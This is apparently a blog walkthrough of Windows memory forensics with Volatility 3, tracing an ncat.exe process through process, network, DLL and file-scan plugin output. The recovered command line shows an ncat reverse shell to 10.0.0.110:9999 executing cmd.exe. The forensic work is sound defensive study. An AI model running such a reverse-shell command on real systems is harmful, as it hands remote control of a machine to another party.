<span style="color: white;"> [-e EXTEND] [-p PLUGIN_DIRS] [-s SYMBOL_DIRS] [-v] [-l LOG]</span>
<span style="color: white;"> [-o OUTPUT_DIR] [-q] [-r RENDERER] [-f FILE]</span>
<span style="color: white;"> [--write-config] [--clear-cache] [--cache-path CACHE_PATH]</span>
<span style="color: white;"> [--offline] [--single-location SINGLE_LOCATION]</span>
<span style="color: white;"> [--stackers [STACKERS ...]]</span>
<span style="color: white;"> [--single-swap-locations [SINGLE_SWAP_LOCATIONS ...]]</span>
<span style="color: white;"> plugin ...</span>
<span style="color: white;">An open-source memory forensics framework</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div>With an understanding of the basic usage of the tool in place, time to use it. First up, getting information on the image.</div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.info.Info</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Variable Value</span>
<span style="color: white;">Kernel Base 0xf8054da03000</span>
<span style="color: white;">DTB 0x1aa000</span>
<span style="color: white;">Symbols file:///home/securitynik/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/3177D31000BA7590DED335936C93E374-1.json.xz</span>
<span style="color: white;">Is64Bit True</span>
<span style="color: white;">IsPAE False</span>
<span style="color: white;">layer_name 0 WindowsIntel32e</span>
<span style="color: white;">memory_layer 1 WindowsCrashDump64Layer</span>
<span style="color: white;">base_layer 2 FileLayer</span>
<span style="color: white;">KdVersionBlock 0xf8054e612378</span>
<span style="color: white;">Major/Minor 15.19041</span>
<span style="color: white;">MachineType 34404</span>
<span style="color: white;">KeNumberProcessors 1</span>
<span style="color: white;">SystemTime 2022-02-25 18:22:36</span>
<span style="color: white;">NtSystemRoot C:\Windows</span>
<span style="color: white;">NtProductType NtProductWinNt</span>
<span style="color: white;">NtMajorVersion 10</span>
<span style="color: white;">NtMinorVersion 0</span>
<span style="color: white;">PE MajorOperatingSystemVersion 10</span>
<span style="color: white;">PE MinorOperatingSystemVersion 0</span>
<span style="color: white;">PE Machine 34404</span>
<span style="color: white;">PE TimeDateStamp Mon Jan 22 06:20:17 2103</span>
</pre></div>
<br /><div>Above, we can grab information such as as Windows version, date the image was taken.</div><div><br /></div><div>Next up, looking at the processes which were running at the time this snapshot was taken. Below I've chosen to focus on <i>ncat.exe</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.pslist.PsList</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output</span>
<span style="color: white;">4 0 System 0xd187b9684040 111 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled</span>
<span style="color: white;">72 4 Registry 0xd187b9754040 4 - N/A False 2022-02-25 18:20:35.000000 N/A Disabled</span>
<span style="color: white;">352 4 smss.exe 0xd187bcf02080 3 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled</span>
<span style="color: white;">444 432 csrss.exe 0xd187c01ea140 11 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">512 432 wininit.exe 0xd187be054080 5 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">520 504 csrss.exe 0xd187be053140 11 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">580 504 winlogon.exe 0xd187be090080 6 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">604 512 services.exe 0xd187be097080 10 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">612 512 lsass.exe 0xd187be09d080 8 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">...</span>
<b><span style="color: #fcff01;"><span>4492 4756 ncat.exe 0xd187c11a5080 5 - 1 False 2022-02-25 18:22:18.000000 N/A Disabled</span>
<span>4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span>
<span>4500 4260 cmd.exe 0xd187c1bc6080 2 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span></span></b>
<span style="color: white;">4584 3960 DumpIt.exe 0xd187c1f81080 6 - 1 False 2022-02-25 18:22:35.000000 N/A Disabled</span>
<span style="color: white;">4636 748 WmiPrvSE.exe 0xd187c1e430c0 11 - 0 False 2022-02-25 18:22:36.000000 N/A Disabled</span>
</pre></div>
</div><div><br /></div><div>Looking at the processes via the <i>psscan</i> plugin.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.psscan.PsScan</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output</span>
<span style="color: white;">4 0 System 0xd187b9684040 111 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled</span>
<span style="color: white;">72 4 Registry 0xd187b9754040 4 - N/A False 2022-02-25 18:20:35.000000 N/A Disabled</span>
<span style="color: white;">352 4 smss.exe 0xd187bcf02080 3 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled</span>
<span style="color: white;">520 504 csrss.exe 0xd187be053140 11 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">512 432 wininit.exe 0xd187be054080 5 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">580 504 winlogon.exe 0xd187be090080 6 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">604 512 services.exe 0xd187be097080 10 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">612 512 lsass.exe 0xd187be09d080 8 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">...</span>
<b><span style="color: #fcff01;"><span>4492 4756 ncat.exe 0xd187c11a5080 5 - 1 False 2022-02-25 18:22:18.000000 N/A Disabled</span>
<span>...</span>
<span>3960 3304 cmd.exe 0xd187c1aed080 3 - 1 False 2022-02-25 18:21:10.000000 N/A Disabled</span>
<span>4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span>
<span>...</span>
<span>4500 4260 cmd.exe 0xd187c1bc6080 2 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span>
<span>4756 4696 cmd.exe 0xd187c1cef080 4 - 1 False 2022-02-25 18:21:55.000000 N/A Disabled</span></span></b>
<span style="color: white;">...</span>
<span style="color: white;">4584 3960 DumpIt.exe 0xd187c1f81080 6 - 1 False 2022-02-25 18:22:35.000000 N/A Disabled</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the established network connections during the time of acquisition with a focus on the process associated with <i>ncat.exe</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.netstat.NetStat</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created</span>
<b><span style="color: #fcff01;"><span>0xd187bff9e730 TCPv4 10.0.0.102 49671 10.0.0.110 9999 ESTABLISHED 4260 ncat.exe 2022-02-25 18:22:18.000000 </span>
</span></b><span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div>Above, there is one established connection with process <i>PID 4260</i>. I will come back to this shortly. Taking another look at the network statistics.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.netscan.NetScan </span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created</span>
<span style="color: white;">0xd187b9697b50 TCPv4 0.0.0.0 5357 0.0.0.0 0 LISTENING 4 System 2022-02-25 18:20:41.000000 </span>
<span style="color: white;">0xd187b9697b50 TCPv6 :: 5357 :: 0 LISTENING 4 System 2022-02-25 18:20:41.000000 </span>
<span style="color: white;">0xd187b9697cb0 TCPv4 0.0.0.0 49668 0.0.0.0 0 LISTENING 1832 spoolsv.exe 2022-02-25 18:20:43.000000 </span>
<span style="color: white;">0xd187bc7a0050 TCPv4 10.0.0.102 139 0.0.0.0 0 LISTENING 4 System 2022-02-25 18:20:40.000000 </span>
<span style="color: white;">0xd187bc7a01b0 TCPv4 0.0.0.0 49668 0.0.0.0 0 LISTENING 1832 spoolsv.exe 2022-02-25 18:20:43.000000 </span>
<span style="color: white;">0xd187bc7a01b0 TCPv6 :: 49668 :: 0 LISTENING 1832 spoolsv.exe 2022-02-25 18:20:43.000000 </span>
<span style="color: white;">...</span>
<span style="color: white;">0xd187c1e3c4b0 UDPv4 127.0.0.1 1900 * 0 1560 svchost.exe 2022-02-25 18:22:35.000000 </span>
<span style="color: white;">0xd187c1e3d2c0 UDPv6 ::1 1900 * 0 1560 svchost.exe 2022-02-25 18:22:35.000000 </span>
</pre></div>
</div><div><br /></div><div>Focusing on the previously identified <i>PID 4260</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.pslist.PsList --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output</span>
<b><span style="color: #fcff01;"><span>4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span>
</span></b></pre></div>
</div><div><br /></div><div>Did the process with <i>PID 4260</i> spawn any other processes? Let's grep on all the processes to see if anything matches. Obviously, a better view would have been to use the process tree via <i>windows.pstree.PsTree</i>. However, this returned some error. So I had to find an alternate path.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList | </span><b><span style="color: #fcff01;">grep 4260</span></b></span>
<span><b><span style="color: #fcff01;">4260</span></b><span style="color: white;"> 4492 </span><b><span style="color: #fcff01;">ncat.exe </span></b><span style="color: white;"> 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span></span>
<span><span style="color: white;">4500 </span><b><span style="color: #fcff01;">4260 cmd.exe <span> </span><span> </span></span></b><span style="color: white;">0xd187c1bc6080 2 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span></span>
</pre></div>
</div><div><br /></div><div><div>Looks like <i>ncat.exe</i> spawned a <i>cmd.exe</i>. Time to dig even deeper into <i>ncat.exe</i> to see what the command line looks like.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.cmdline.CmdLine --pid 4260</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Args</span>
<span><b><span style="color: #fcff01;">4260 ncat.exe </span></b><span style="color: #fcff01;"><b>"C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\</b></span><b><span style="color: #fcff01;">ncat.exe" --verbose 10.0.0.110 9999 --exec cmd.exe</span></b></span>
</pre></div>
</div><div><br /></div><div><div>Above, we see <i>ncat.exe </i>command line involved <i>cmd.exe</i>. We also see the IP address of <i>10.0.0.110</i> on port <i>9999</i>. This is good information so far.</div><div><br /></div><div>Looking at the command line for cmd.exe with <i>PID 4500</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.cmdline.CmdLine -</span><span style="color: #fcff01;"><b>-pid 4500</b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Args</span>
<b><span style="color: #fcff01;"><span>4500 cmd.exe cmd.exe</span>
</span></b></pre></div>
</div><div><br /></div><div>Above shows nothing as interesting as the command line for<i> ncat.exe</i>.</div><div><br /></div><div>Looking at the DLLs being loaded by <i>ncat.exe.</i></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.dlllist.DllList --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process <span> </span><span> </span>Base <span> </span><span> </span>Size <span> </span><span> </span>Name <span> </span><span> </span>Path <span> <span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span></span>LoadTime <span> </span><span> </span><span> </span><span> </span> File output</span>
<span style="color: white;">4260 ncat.exe 0x730000 0x1a1000 ncat.exe C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2ab70000 0x1f5000 ntdll.dll C:\Windows\SYSTEM32\ntdll.dll 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2a810000 0x59000 <span> </span><span> </span>wow64.dll C:\Windows\System32\wow64.dll 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4260 ncat.exe 0x7ffe29950000 0x83000 <span> </span><span> </span>wow64win.dll C:\Windows\System32\wow64win.dll <span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span>2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4260 ncat.exe 0x771d0000 0xa000 <span> </span><span> </span>wow64cpu.dll C:\Windows\System32\wow64cpu.dll <span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span>2022-02-25 18:22:18.000000 Disabled</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the DLLs for the <i>cmd.exe</i> process with PID 4500</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.dlllist.DllList --pid 4500</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Base Size Name Path LoadTime File output</span>
<span style="color: white;">4500 cmd.exe 0x1000000 0x5a000 cmd.exe C:\Windows\SysWOW64\cmd.exe 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4500 cmd.exe 0x7ffe2ab70000 0x1f5000 ntdll.dll C:\Windows\SYSTEM32\ntdll.dll 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4500 cmd.exe 0x7ffe2a810000 0x59000 wow64.dll C:\Windows\System32\wow64.dll 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4500 cmd.exe 0x7ffe29950000 0x83000 wow64win.dll C:\Windows\System32\wow64win.dll 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4500 cmd.exe 0x771d0000 0xa000 wow64cpu.dll C:\Windows\System32\wow64cpu.dll 2022-02-25 18:22:18.000000 Disabled</span>
</pre></div>
</div><div><br /></div><div>Looking at the modules</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.ldrmodules.LdrModules --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Pid Process Base InLoad InInit InMem MappedPath</span>
<span style="color: white;">4260 ncat.exe 0x75c20000 False False False \Windows\SysWOW64\KernelBase.dll</span>
<span style="color: white;">4260 ncat.exe 0x730000 True False True \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe</span>
<span style="color: white;">4260 ncat.exe 0x1400000 False False False \Windows\SysWOW64\winnlsres.dll</span>
<span style="color: white;">4260 ncat.exe 0x1410000 False False False \Windows\System32\en-US\winnlsres.dll.mui</span>
<span style="color: white;">4260 ncat.exe 0x73a70000 False False False \Windows\SysWOW64\apphelp.dll</span>
<span style="color: white;">4260 ncat.exe 0x10000000 False False False \Windows\SysWOW64\pcapwsp.dll</span>
<span style="color: white;">4260 ncat.exe 0x75180000 False False False \Windows\SysWOW64\kernel32.dll</span>
<span style="color: white;">4260 ncat.exe 0x745e0000 False False False \Windows\SysWOW64\cryptsp.dll</span>
<span style="color: white;">4260 ncat.exe 0x74500000 False False False \Windows\SysWOW64\mswsock.dll</span>
<span style="color: white;">4260 ncat.exe 0x73b20000 False False False \Windows\SysWOW64\cryptbase.dll</span>
<span style="color: white;">4260 ncat.exe 0x74560000 False False False \Windows\SysWOW64\rsaenh.dll</span>
<span style="color: white;">4260 ncat.exe 0x750a0000 False False False \Windows\SysWOW64\gdi32full.dll</span>
<span style="color: white;">4260 ncat.exe 0x747b0000 False False False \Windows\SysWOW64\version.dll</span>
<span style="color: white;">4260 ncat.exe 0x759d0000 False False False \Windows\SysWOW64\gdi32.dll</span>
<span style="color: white;">4260 ncat.exe 0x75830000 False False False \Windows\SysWOW64\user32.dll</span>
<span style="color: white;">4260 ncat.exe 0x75b60000 False False False \Windows\SysWOW64\msvcrt.dll</span>
<span style="color: white;">4260 ncat.exe 0x771e0000 False False False \Windows\SysWOW64\ntdll.dll</span>
<span style="color: white;">4260 ncat.exe 0x763e0000 False False False \Windows\SysWOW64\advapi32.dll</span>
<span style="color: white;">4260 ncat.exe 0x75ee0000 False False False \Windows\SysWOW64\msvcp_win.dll</span>
<span style="color: white;">4260 ncat.exe 0x75e60000 False False False \Windows\SysWOW64\sechost.dll</span>
<span style="color: white;">4260 ncat.exe 0x75e40000 False False False \Windows\SysWOW64\bcrypt.dll</span>
<span style="color: white;">4260 ncat.exe 0x762a0000 False False False \Windows\SysWOW64\imm32.dll</span>
<span style="color: white;">4260 ncat.exe 0x762d0000 False False False \Windows\SysWOW64\bcryptprimitives.dll</span>
<span style="color: white;">4260 ncat.exe 0x766e0000 False False False \Windows\SysWOW64\rpcrt4.dll</span>
<span style="color: white;">4260 ncat.exe 0x766c0000 False False False \Windows\SysWOW64\win32u.dll</span>
<span style="color: white;">4260 ncat.exe 0x76460000 False False False \Windows\SysWOW64\ucrtbase.dll</span>
<span style="color: white;">4260 ncat.exe 0x76cf0000 False False False \Windows\SysWOW64\ws2_32.dll</span>
<span style="color: white;">4260 ncat.exe 0x771d0000 True True True \Windows\System32\wow64cpu.dll</span>
<span style="color: white;">4260 ncat.exe 0x7e110000 False False False \Tools\Cmder\vendor\conemu-maximus5\ConEmu\ConEmuHk.dll</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2a810000 True True True \Windows\System32\wow64.dll</span>
<span style="color: white;">4260 ncat.exe 0x7ffe29950000 True True True \Windows\System32\wow64win.dll</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2ab70000 True True True \Windows\System32\ntdll.dll</span>
</pre></div>
</div><p>Nothing seems out of the way above. Dumping the files associated with <i>ncat.exe</i></p><div><i><!--HTML generated using hilite.me--></i><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.dumpfiles.DumpFiles --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Cache FileObject FileName Result</span>
<span style="color: white;">ImageSectionObject 0xd187bfc10bb0 KernelBase.dll file.0xd187bfc10bb0.0xd187bcf3a770.ImageSectionObject.KernelBase.dll.img</span>
<span style="color: white;">DataSectionObject 0xd187c14add70 ncat.exe Error dumping file</span>
<span style="color: white;">ImageSectionObject 0xd187c14add70 ncat.exe file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>With the files dumped, taking a closer look at the files.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ ls | grep ncat</span>
<span style="color: white;">file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img</span>
<span style="color: white;">file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat</span>
<span style="color: white;">...</span>
</pre></div>
<br />Using the file command to identify two files above</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">file file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img \</span></b></span><b><span style="color: #fcff01;">
<span>> file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat</span></span></b>
<span style="color: white;">file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img: </span><span style="color: #fcff01;"><b>PE32 executable</b></span><span style="color: white;"> (console) Intel 80386, for MS Windows</span>
<span><span style="color: white;">file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat: </span><b><span style="color: #fcff01;">PE32 executable</span></b><span style="color: white;"> (console) Intel 80386, for MS Windows</span></span>
</pre></div>
</div><div><br /></div><div><div>We can see the files are being reported as a PE32 executable. Good start.</div><div><br /></div><div>A different view of file information.<br /><br /></div></div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.filescan.FileScan | grep -i ncat</span></b><span style="color: white;"> </span></span>
<span style="color: white;">0xd187c14add70.0\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe 216</span>
<span style="color: white;">0xd187c1e11be0 \ProgramData\chocolatey\bin\ncat.exe 216</span>
<span style="color: white;">0xd187c1e279e0 \Windows\Prefetch\NCAT.EXE-4B4B887F.pf 216</span>
<span style="color: white;">0xd187c1e2a280 \ProgramData\chocolatey\bin\ncat.exe 216</span>
<span style="color: white;">0xd187c1e32750 \Windows\Prefetch\NCAT.EXE-1B3976EF.pf 216</span>
<span style="color: white;">0xd187c1e34820 \ncat-0 216</span>
<span style="color: white;">0xd187c1e349b0 \ncat-0 216</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>We see at least there is information on the path of the file as well as their is a prefetch entry.</p><p>Looking at the MFTScan plugin.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.mftscan.MFTScan</span></b><span style="color: white;"> | grep -i ncat</span></span>
<span style="color: white;">* 0xbb0681ad38b00 FILE 104014an2ing finFiled Archive FILE_NAME 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 ncat.exe.log</span>
<span style="color: white;">* 0xbb0681ad3928 FILE 104014 2 File Archive FILE_NAME 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 NCATEX~1.LOG</span>
<span style="color: white;">...</span>
